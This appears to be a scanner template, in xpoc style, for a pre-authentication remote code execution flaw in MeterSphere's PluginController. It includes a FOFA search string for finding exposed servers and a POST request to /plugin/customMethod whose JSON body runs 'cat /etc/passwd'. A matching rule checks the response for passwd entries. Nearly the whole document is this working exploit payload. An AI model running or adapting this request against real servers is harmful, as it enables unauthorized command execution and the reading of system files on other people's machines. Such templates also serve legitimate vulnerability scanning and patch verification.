漏洞描述
FaFo: body="Metersphere"
id: metersphere-plugincontroller-rce
info:
name: MeterSphere PluginController Pre-auth RCE
author: xpoc
severity: critical
verified: true
description: |
FaFo: body="Metersphere"
reference:
- https://xz.aliyun.com/t/10772
tags: metersphere,rce
created: 2023/06/22
rules:
r0:
request:
method: POST
path: /plugin/customMethod
headers:
Content-Type: application/json
body: '{"entry": "Evil", "request": "cat /etc/passwd"}'
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()